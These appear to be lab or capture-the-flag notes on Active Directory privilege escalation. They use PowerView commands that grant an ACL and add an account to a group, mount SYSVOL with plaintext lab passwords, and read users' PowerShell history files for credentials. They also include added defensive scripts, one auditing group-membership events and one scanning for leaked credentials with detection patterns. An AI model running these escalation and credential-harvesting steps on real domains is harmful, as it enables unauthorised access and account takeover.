This is a collection of techniques for reaching Domain Admin once a foothold in the domain has been obtained.
Assign user to a group
# Load PowerView, then build a credential object for the account that holds write rights over the target group.
Import-Module ./PowerView.ps1
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd', $SecPassword)
# Grant the principal an ACE on the group object, then add it as a member (the original notes show both steps).
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd"
Add-DomainGroupMember -Identity 'Core Staff' -Members 'streamio\JDgodd' -Credential $Cred
# Confirm the new membership.
net group 'Core Staff'
Examples: [[StreamIO#dc6ecc]]
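Membership changes like the one above leave a trail in the domain controller's Security log. The script below is an added example for the defensive side (it is not part of the original notes and not PowerView code): it pulls recent "member added" events (4728, 4732, 4756 for global, local and universal security groups) and flags the ones that touch groups worth reviewing. The DC name dc.fulcrum.local and the group name Core Staff are reused from the notes as placeholders; the script assumes "Audit Security Group Management" is enabled and that the caller can read the DC's Security log.

```powershell
# Added example, not from the original notes: report recent additions to
# security groups on a DC and flag privileged ones.
param(
    [string]$ComputerName = 'dc.fulcrum.local',   # placeholder DC name taken from the notes
    [int]$Hours = 24                              # how far back to look
)

# Groups whose membership changes should always be reviewed (extend as needed).
# 'Core Staff' is the group from the notes; the others are built-in privileged groups.
$PrivilegedGroups = @(
    'Domain Admins', 'Enterprise Admins', 'Schema Admins', 'Administrators',
    'Account Operators', 'Backup Operators', 'Core Staff'
)

# 4728 = member added to a security-enabled global group
# 4732 = member added to a security-enabled local group
# 4756 = member added to a security-enabled universal group
$filter = @{
    LogName   = 'Security'
    Id        = 4728, 4732, 4756
    StartTime = (Get-Date).AddHours(-$Hours)
}

Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
    ForEach-Object {
        # Pull the named EventData fields out of the event XML.
        $x = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $x.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        # TargetUserName = the group that changed, MemberName = DN of the account added,
        # SubjectUserName = the account that made the change.
        $group = $data['TargetUserName']
        $flag  = if ($PrivilegedGroups -contains $group) { 'PRIVILEGED' } else { '' }

        [pscustomobject]@{
            Time      = $_.TimeCreated
            EventId   = $_.Id
            Group     = $group
            Member    = $data['MemberName']
            ChangedBy = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
            Flag      = $flag
        }
    } |
    Sort-Object Time -Descending |
    Format-Table -AutoSize
```

The ACL write that precedes the membership change (Add-DomainObjectAcl above) is not covered by these three IDs; with "Audit Directory Service Changes" enabled it shows up as event 5136 on the group object, which is worth adding to the filter if you want to catch the setup step rather than only the result.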
SYSVOL Share DC
We can enumerate SMB Shares within the machine: ^cae2ef
PS C:\Users\BTables\Desktop> Get-SMBShare
Name   ScopeName Path Description
----   --------- ---- -----------
ADMIN$ *              Remote Admin
C$     *              Default share
IPC$   *              Remote IPC
We can try to connect to the shares on the DC:
PS C:\Users\BTables\Desktop> net use \\dc.fulcrum.local\IPC$ /user:FULCRUM\BTables ++FileServerLogon12345++
The command completed successfully.
And then we can list the shares in the DC:
PS C:\Users\BTables\Desktop> net view \\dc.fulcrum.local\
Shared resources at \\dc.fulcrum.local\

Share name Type Used as Comment
-------------------------------------------------------------------------------
NETLOGON   Disk         Logon server share
SYSVOL     Disk         Logon server share
The command completed successfully.
We can then mount the SYSVOL share on the compromised machine to check its content:
PS C:\Users\BTables\Desktop> net use x: \\dc.fulcrum.local\SYSVOL /user:FULCRUM\BTables ++FileServerLogon12345++
The command completed successfully.
And we found a ton of scripts inside the share:
PS X:\fulcrum.local\scripts> dir

    Directory: X:\fulcrum.local\scripts

Mode   LastWriteTime      Length Name
----   -------------      ------ ----
-a---- 2/12/2022 10:34 PM    340 00034421-648d-4835-9b23-c0d315d71ba3.ps1
-a---- 2/12/2022 10:34 PM    340 0003ed3b-31a9-4d8f-a152-a234ecb522d4.ps1
Powershell History
We can retrieve commands a user previously ran in PowerShell by reading ConsoleHost_history.txt, the PowerShell equivalent of the Linux .bash_history file. #Note The path below is relative, so the command has to be run from the user's profile folder, because the file lives under AppData:
PS C:\Users\legacyy> type AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Examples: Timelapse
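Both the SYSVOL scripts section above and this PowerShell history section come down to the same weakness: credentials left in files that a low-privileged account can read. The script below is an added example for the defensive side (not part of the original notes) that sweeps both locations for credential-looking lines so the secrets can be rotated and the files cleaned up. The SYSVOL path reuses dc.fulcrum.local and fulcrum.local from the notes as placeholders; the PSReadLine history path is the one shown above, checked for every profile under C:\Users. It assumes the account running it can read SYSVOL and the profile directories.

```powershell
# Added example, not from the original notes: find plaintext credentials in
# SYSVOL logon scripts and in per-user PSReadLine history files.
param(
    [string]$SysvolScripts = '\\dc.fulcrum.local\SYSVOL\fulcrum.local\scripts',  # placeholder path from the notes
    [string]$ProfileRoot   = 'C:\Users'
)

# Regexes for the kinds of credential material the notes show being left behind.
# -match is case-insensitive by default, so no (?i) is needed.
$Patterns = @{
    'PSCredential plaintext' = 'ConvertTo-SecureString\s+[''"][^''"]+[''"]\s+-AsPlainText'
    'net use with password'  = 'net\s+use\b.*/user:\S+\s+\S+'
    'password assignment'    = '\b(password|passwd|pwd)\s*[=:]\s*[''"]?\S{6,}'
    'runas / psexec -p'      = '\s-p(ass(word)?)?\s+\S{6,}'
}

function Find-CredentialLeak {
    param([string[]]$Path)
    foreach ($file in Get-ChildItem -Path $Path -File -Recurse -ErrorAction SilentlyContinue) {
        $lineNo = 0
        foreach ($line in Get-Content -Path $file.FullName -ErrorAction SilentlyContinue) {
            $lineNo++
            foreach ($name in $Patterns.Keys) {
                if ($line -match $Patterns[$name]) {
                    [pscustomobject]@{
                        File    = $file.FullName
                        Line    = $lineNo
                        Pattern = $name
                        # Truncate every token longer than four characters so the
                        # report itself does not become a new copy of the secrets.
                        Snippet = ($line.Trim() -replace '(\S{4})\S+', '$1****')
                    }
                }
            }
        }
    }
}

# 1. SYSVOL scripts: readable by every domain user, so anything here is effectively public.
$hits = @(Find-CredentialLeak -Path $SysvolScripts)

# 2. PSReadLine history: one file per profile, at the same path the notes read it from.
$historyFiles = Get-ChildItem -Path $ProfileRoot -Directory -ErrorAction SilentlyContinue |
    ForEach-Object { Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt' } |
    Where-Object { Test-Path $_ }
if ($historyFiles) {
    $hits += @(Find-CredentialLeak -Path $historyFiles)
}

$hits | Sort-Object File, Line | Format-Table -AutoSize
```

Run it from a scheduled task on a DC or a management host and treat every hit as a credential to rotate, not just a file to delete: the history file in particular is written by PSReadLine after the fact, so the password was already typed on the command line and is in the Security log's process-creation events as well if command-line auditing is on.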